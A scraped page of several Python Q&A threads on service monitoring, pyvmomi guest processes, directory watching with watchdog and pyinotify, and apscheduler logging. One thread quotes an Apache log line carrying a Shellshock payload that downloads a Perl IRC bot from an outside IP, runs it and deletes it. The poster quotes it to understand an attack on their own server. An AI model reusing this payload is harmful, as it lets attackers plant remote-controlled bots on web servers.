Python, Service dies but PID remains.. Log file updates every minute - python

I have service that as the topic says dies and leave a stale PID behind. This particular service logs every minute. So basically I want to create a python script to check the logfile based on modified time, if file has not updated in say 3 minutes then restart service.
I am new to scripting / programming so I need help with the logic here please...
this is what I have so far to do the check on the file age.
#!/usr/bin/python
import os, datetime, time
from os import path
from datetime import datetime, timedelta
#file = "/var/log/file.log"
def check_file(seconds, file_name):
try:
time_diff = datetime.now() - timedelta(seconds)
file_time = datetime.fromtimestamp(path.getctime(file_name))
if file_time < time_diff:
return [True, "File: %s. Older than: %s, file_time:%s , date_diff:%s " % (file_name, seconds, file_time, time_diff)]
else:
return [True, "File: %s. Older than: %s, file_time:%s , date_diff:%s " % (file_name, seconds, file_time, time_diff)]
except Exception, e:
return [False, e]

Before writing custom code to handle this problem (and now having 2 problems), I'd look at:
fixing the service itself so that it doesn't die,
adding monitoring to that service at the box level (see this
for example).
If these options are not practical, I would start with a bash based solution over Python.
In either case, you'll need to make sure that the restarting script doesn't die either.

Related

Executing program via pyvmomi creates a process, but nothing happens after that

I'm studying vCenter 6.5 and community samples help a lot, but in this particular situation I can't figure out, what's going on. The script:
from __future__ import with_statement
import atexit
from tools import cli
from pyVim import connect
from pyVmomi import vim, vmodl
def get_args():
*Boring args parsing works*
return args
def main():
args = get_args()
try:
service_instance = connect.SmartConnectNoSSL(host=args.host,
user=args.user,
pwd=args.password,
port=int(args.port))
atexit.register(connect.Disconnect, service_instance)
content = service_instance.RetrieveContent()
vm = content.searchIndex.FindByUuid(None, args.vm_uuid, True)
creds = vim.vm.guest.NamePasswordAuthentication(
username=args.vm_user, password=args.vm_pwd
)
try:
pm = content.guestOperationsManager.processManager
ps = vim.vm.guest.ProcessManager.ProgramSpec(
programPath=args.path_to_program,
arguments=args.program_arguments
)
res = pm.StartProgramInGuest(vm, creds, ps)
if res > 0:
print "Program executed, PID is %d" % res
except IOError, e:
print e
except vmodl.MethodFault as error:
print "Caught vmodl fault : " + error.msg
return -1
return 0
# Start program
if __name__ == "__main__":
main()
When I execute it in console, it successfully connects to the target virtual machine and prints
Program executed, PID is 2036
In task manager I see process with mentioned PID, it was created by the correct user, but there is no GUI of the process (calc.exe). RMB click does not allow to "Expand" the process.
I suppose, that this process was created with special parameters, maybe in different session.
In addition, I tried to run batch file to check if it actually executes, but the answer is no, batch file does not execute.
Any help, advices, clues would be awesome.
P.S. I tried other scripts and successfully transferred a file to the VM.
P.P.S. Sorry for my English.
Update: All such processes start in session 0.
Have you tried interactiveSession ?
https://github.com/vmware/pyvmomi/blob/master/docs/vim/vm/guest/GuestAuthentication.rst
This boolean argument passed to NamePasswordAuthentication and means the following:
This is set to true if the client wants an interactive session in the guest.

A python script to monitor a directory for new files

Similar questions have been asked but they either did not work for me or I failed to understand the answers.
I run Apache2 webserver and host a few petty personal sites. I am being cyberstalked, or someone is attempting to hack me.
The Apache2 access log shows
195.154.80.205 - - [05/Nov/2015:09:57:09 +0000] "GET /info.cgi HTTP/1.1" 404 464 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\r\n\r\nXSUCCESS!\";system(\"wget http://190.186.76.252/cox.pl -O /tmp/cox.pl;curl -O /tmp/cox.pl http://190.186.76.252/cox.pl;perl /tmp/cox.pl;rm -rf /tmp/cox.pl*\");'"
which is clearly attempting (over and over again in my logs) to force my server to download 'cox.pl' then run 'cox.pl' then remove 'cox.pl'.
I really want to know what is in cox.pl which could be a modified version of Cox-Data-Usage which is there on github.
I would like a script that will constantly monitor my /tmp folder, and when a new file is added then copy that file to another directory for me to see what it is doing, or attempting to do at least.
I know I could deny access etc. but I want to find out what these hackers are trying to do and see if I can gather intel about them.
The script in question can be easily downloaded, it contains ShellBOT by: devil__ so... guess ;-)
You could use tutorial_notifier.py from pyinotify, but there's no need for this particular case. Just do
curl http://190.186.76.252/cox.pl -o cox.pl.txt
less cox.pl.txt
to check the script.
It looks like a good suite of hacks for Linux 2.4.17 - 2.6.17 and maybe BSD*, not that harmless to me, IRC related. It has nothing to do with Cox-Data-Usage.
The solution to the question wouldn't lie in a python script, this is more of a security issue for the likes of Fail2ban or similar to handle, but there is a way to monitor a directory for changes using Python Watchdog. (pip install watchdog)
Taken from: https://pythonhosted.org/watchdog/quickstart.html#a-simple-example
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import LoggingEventHandler
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
path = sys.argv[1] if len(sys.argv) > 1 else '.'
event_handler = LoggingEventHandler()
observer = Observer()
observer.schedule(event_handler, path, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
This will log all changes, (it can be configured for just file creation).
If you want to rename new files to something else, you first need to know if the file is free or any modifications will fail, i.e it's not finished downloading/creation. That issue can mean that a call to that file can come before you've moved or renamed it programmatically. That's why this isn't a solution.
I got some solution,
solution 1 (CPU usage: 27.9% approx= 30%):
path_to_watch = "your/path"
print('Your folder path is"',path,'"')
before = dict ([(f, None) for f in os.listdir (path_to_watch)])
while 1:
after = dict ([(f, None) for f in os.listdir (path_to_watch)])
added = [f for f in after if not f in before]
if added:
print("Added: ", ", ".join (added))
break
else:
before = after
I have edited the code, the orginal code is available at http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.html
The original code was made in python 2x so you need to convert it in python 3.
NOTE:-
WHEN EVER YOU ADD ANY FILE IN PATH, IT PRINTS THE TEXT AND BREAKS, AND IF NO FILES ARE ADDED THEN IT WOULD CONTINUE TO RUN.
Solution 2 (CPU usage: 23.4 approx=20%)
import os
path=r'C:\Users\Faraaz Anas Ammaar\Documents\Programming\Python\Eye-Daemon'
b=os.listdir(path)
path_len_org=len(b)
def file_check():
while 1:
b=os.listdir(path)
path_len_final=len(b)
if path_len_org<path_len_final:
return "A file is added"
elif path_len_org>path_len_final:
return "A file is removed"
else:
pass
file_check()

Python/bash wget file and see if contents matches unix timestamp

Scenario
One web server user hits execute that will produce a file called now.txt and inside this file will current unix timestamp
On the current machines I need a way to check if that file has a timestamp that is within 5 minutes on its current time and if say execute another command
I was thinking of having a cronjob running on the client machine every 5 minutes that will do a wget of the file from the webserver then check the contents for its unix timestamp then compare it with the current time
Not sure if that makes sense and not sure if I have over egged it so would be good to get some advice?
Python script
wget file
check file is with 5 minutes of current time
run another command
import wget
from datetime import datetime;
url = 'http://example.com/test/now.txt'
filename = wget.download(url)
try:
f = open("now.txt", "rb");
age = datetime.utcnow() - datetime.utcfromtimestamp(long(f.read()));
except :
pass
To read a Unix timestamp that is saved in a remote file and to compare it with the current time on the client (assuming the clocks are synchronized e.g., using ntp):
#!/usr/bin/env python3
import time
from urllib.request import urlopen
with urlopen('http://example.com/test/now.txt') as r:
timestamp = int(r.read())
if abs(time.time() - timestamp) < 300:
print('the current time is within 5 minutes')

How much CPU should a Python time.sleep(n) call use

I have a programme running on an old laptop which is constantly monitoring a Dropbox folder for new files being added. When it's running the Python process uses close to 50% of the CPU on a dual-core machine, and about 12% on an 8-core machine which suggests it's using close to 100% of one core). This is giving off a lot of heat.
The relevant bit of code is:
while True:
files = dict ([(f, None) for f in os.listdir(path_to_watch)])
if len(files) > 0:
print "You have %s new file/s!" % len(files)
time.sleep(20)
In the case that there is no new file, surely most of the time should be spent in the time.sleep() waiting which I wouldn't have thought would be CPU-intensive - and the answers here seem to say it shouldn't be.
So two questions:
1) Since time.sleep() shouldn't be so CPU-intensive, what is going on here?
2) Is there another way of monitoring a folder for changes which would run cooler?
1) Your sleep only gets called when there are new files.
This should be much better:
while True:
files = dict ([(f, None) for f in os.listdir(path_to_watch)])
if len(files) > 0:
print "You have %s new file/s!" % len(files)
time.sleep(20)
2) Yes, especially if using linux. Gamin would be something I'd recommend looking into.
Example:
import gamin
import time
mydir = /path/to/watch
def callback(path, event):
global mydir
try:
if event == gamin.GAMCreated:
print "New file detected: %s" % (path)
fullname = mydir + "/" + path
print "Goint to read",fullname
data = open(fullname).read()
print "Going to upload",fullname
rez = upload_file(data,path)
print "Response from uploading was",rez
except Exception,e: #Not good practice
print e
import pdb
pdb.set_trace()
mon = gamin.WatchMonitor()
mon.watch_directory(mydir, callback)
time.sleep(1)
while True:
ret = mon.handle_one_event()
mon.stop_watch(mydir)
del mon
There is also a cross platform API to monitor file system changes: Watchdog

How to specify 'logger' for apscheduler

I'm trying to learn how to use Python's apscheduler package, but periodically, it throws the following error:
No handlers could be found for logger "apscheduler.scheduler"
This message seems to be associated with errors in the scheduled jobs, for example, using jobTester as the scheduled job, the following code, which uses an undefined variable (nameStr0) in jobTester gives the above error message:
from apscheduler.scheduler import Scheduler
from apscheduler.jobstores.shelve_store import ShelveJobStore
from datetime import datetime, timedelta
from schedJob import toyJob
def jobTester(nameStr):
outFileName = nameStr0 + '.txt'
outFile = open(outFileName,'w')
outFile.write(nameStr)
outFile.close()
def schedTester(jobList):
scheduler = Scheduler()
scheduler.add_jobstore(ShelveJobStore('example.db'),'shelve')
refTime = datetime.now()
for index, currJob in enumerate(jobList):
runTime = refTime + timedelta(seconds = 15)
jobName = currJob.name + '_' + str(index)
scheduler.add_date_job(jobTester, runTime, name = jobName,
jobstore = 'shelve', args = [jobName])
scheduler.start()
stopTime = datetime.now() + timedelta(seconds = 45)
print "Starting wait loop .....",
while stopTime > datetime.now():
pass
print "Done"
def doit():
names = ['Alan','Barbara','Charlie','Dana']
jobList = [toyJob(n) for n in names]
schedTester(jobList)
This may be seen by running this code (stored in the file schedTester.py) as follows:
>>> import schedTester
>>> schedTester.doit()
No handlers could be found for logger "apscheduler.scheduler"
Starting wait loop ..... Done
However, when I replace nameStr0 with nameStr (i.e. proper spelling of variable name), the code runs fine without the error message.
How do I create a logger for apscheduler.scheduler? Am I missing something in the section of the docs dealing with configuring the scheduler
Am I correct in thinking of this logger as some sort of a stderr ? If so, where will I look for it (if that is not determined by the way I set it up)
You can just create a default logger and everything should go to it:
import logging
logging.basicConfig()
The reason that you only have a problem when you use a variable that hasn't been defined is that this causes the jobTester function to throw an error which apscheduler is catching and trying to write the error message with logging.error(). Since you haven't setup the logger it is going to complain.
If you read up on python logging you will see that there are many ways to configure it. You could have it log everything to a file or print it to stdout.

Categories